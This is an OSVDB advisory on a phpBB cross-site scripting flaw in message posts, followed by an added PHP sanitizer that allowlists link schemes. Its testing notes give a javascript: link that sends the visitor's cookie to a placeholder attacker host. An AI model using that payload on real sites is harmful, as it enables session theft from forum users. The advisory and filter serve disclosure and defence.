phpBB JavaScript Message Content XSS

2003-08-19T08:58:18
ID OSVDB:2145
Type osvdb
Reporter OSVDB
Modified 2003-08-19T08:58:18

Description

Vulnerability Description

phpBB contains a flaw that allows a remote cross-site scripting attack. The flaw exists because the application does not validate JavaScript submitted in message posts. This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.

Solution Description

Currently, there are no known upgrades or patches to correct this issue. It is possible to correct the flaw by implementing the following workaround: Completely disable HTML posting in the phpBB software.

Manual Testing Notes

The example below will send the user's cookie to a malicious web site:

<a href="javascript:document.location.replace('http://[attacker]/cgi-bin/evil.cgi?stolen_cookie='+ document.cookie);">Click me, I'm innocent</a>
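A server-side check for the link form shown above, as an added example that is not phpBB code and not part of the original advisory: it allowlists URL schemes in user-supplied href values and re-escapes what it accepts. The function name, the scheme list, and the sample inputs are assumptions constructed for illustration.

```php
<?php
declare(strict_types=1);

// Hypothetical allowlist: schemes a forum link may use. Anything else
// (javascript:, data:, vbscript:, ...) causes the link to be dropped.
const ALLOWED_SCHEMES = ['http', 'https', 'ftp', 'mailto'];

/**
 * Return an attribute-safe href for a user-supplied link target,
 * or null when the link must be dropped. (Illustrative helper, not a phpBB API.)
 */
function safe_href(string $raw): ?string
{
    // Judge the value the browser will see: decode character references first.
    $url = html_entity_decode($raw, ENT_QUOTES | ENT_HTML5, 'UTF-8');
    // Browsers ignore tab/CR/LF inside a URL and strip leading control
    // characters, so remove all ASCII whitespace and controls before checking.
    $url = preg_replace('/[\x00-\x20]+/', '', $url);
    if ($url === null || $url === '') {
        return null;
    }
    // A scheme can only appear before the first "/", "?" or "#".
    $head  = substr($url, 0, strcspn($url, '/?#'));
    $colon = strpos($head, ':');
    if ($colon !== false) {
        $scheme = strtolower(substr($head, 0, $colon));
        if (!in_array($scheme, ALLOWED_SCHEMES, true)) {
            return null;   // unknown or script-capable scheme
        }
    }
    // No colon in the head: relative URL, allowed. Re-escape on output so
    // anything left undecoded cannot be reinterpreted by the browser.
    return htmlspecialchars($url, ENT_QUOTES | ENT_HTML5 | ENT_SUBSTITUTE, 'UTF-8');
}

// Constructed sample inputs (not taken from a real forum).
$samples = [
    'http://forum.example/viewtopic.php?t=42&p=7',
    'viewtopic.php?t=42',
    'mailto:admin@forum.example',
    'javascript:void(0)',
    'JaVaScRiPt:void(0)',
    "java\tscript:void(0)",
    '&#106;avascript:void(0)',
];
foreach ($samples as $s) {
    $out = safe_href($s);
    printf("%-48s => %s\n", json_encode($s), $out ?? '[link dropped]');
}
```

The check is deliberately conservative: a relative URL whose first path segment contains a colon is also dropped.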

References:

Vendor Specific Advisory URL
Secunia Advisory ID: 9567
Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2003-08/0266.html
ISS X-Force ID: 10696
CERT: CA-2000-02
Bugtraq ID: 6248